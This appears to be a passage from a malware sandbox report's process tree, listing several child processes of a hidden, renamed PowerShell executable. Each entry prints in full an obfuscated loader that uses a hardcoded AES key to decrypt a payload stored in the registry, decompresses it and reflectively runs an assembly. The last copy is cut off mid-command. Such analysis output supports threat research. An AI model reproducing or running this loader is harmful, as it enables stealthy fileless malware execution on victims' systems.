[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:5284
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:3512
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:6396
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:6184
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 